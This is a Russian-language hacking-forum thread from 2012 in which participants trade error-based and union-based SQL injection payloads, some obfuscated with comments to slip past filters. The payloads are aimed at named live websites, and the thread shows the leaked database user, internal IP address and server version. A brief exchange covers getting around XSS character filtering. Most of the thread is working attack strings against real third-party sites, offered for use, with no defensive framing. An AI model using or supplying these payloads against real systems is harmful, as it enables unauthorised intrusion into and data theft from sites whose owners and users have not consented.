ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.03.2012, 20:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
9763
Репутация:
8
|
|
Сообщение от GaMeSTeR
GaMeSTeR said:
Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
спасибо друг
|
|
|
|
30.03.2012, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.
|
|
|
|
30.03.2012, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
Сообщение от ReV0LVeR
ReV0LVeR said:
Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.
Есть много способов обхода фильтрации XSS. Лучше скажите, какие символы фильтруются.
Попробуйте ввести следующее символы:
и посмотрите в исходном коде HTML страницы, какие символы отфильтровались, а какие нет.
|
|
|
|
30.03.2012, 15:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
'';!--"<xss>=&{()}
|
|
|
|
30.03.2012, 15:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
Сообщение от ReV0LVeR
ReV0LVeR said:
'';!--"<xss>=&{()}
Как Вы видите, практически все спец. символы фильтруются.
Увы, но обойти в Вашем случае фильтрацию нельзя.
|
|
|
|
30.03.2012, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
народ, чёт не могу тут нечё сделать, подскажите
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+
|
|
|
|
30.03.2012, 19:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
народ, чёт не могу тут нечё сделать, подскажите
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+
Код:
Code:
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=87/**/and(select+1/**/from(select+count(*),concat((select+table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+g
Access denied for user 'azyb'@'127.0.0.27' to database 'information_schema'.
Брути таблицы...
|
|
|
|
30.03.2012, 20:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
блин, плохо, а тут постоянно переадресация чтобы не ввёл
http://www.33hochu.ru/fanclub.php?id=956%27
как с ней справится?
|
|
|
|
31.03.2012, 00:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
2160
Репутация:
0
|
|
Сообщение от qaz
qaz said:
блин, плохо, а тут постоянно переадресация чтобы не ввёл
http://www.33hochu.ru/fanclub.php?id=956%27
как с ней справится?
Взгляни лучше сюда:
http://www.33hochu.ru/view_foto.php?id=82426'+union+select+version(),dat abase()+--+
Смотреть исходный код страницы. Дальше разберешься?
user()=33h
database()=33h@10.10.10.21
version()=5.5.22-1~dotdeb.0-log
|
|
|
|
31.03.2012, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Если я не ошибаюсь, то там blind.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
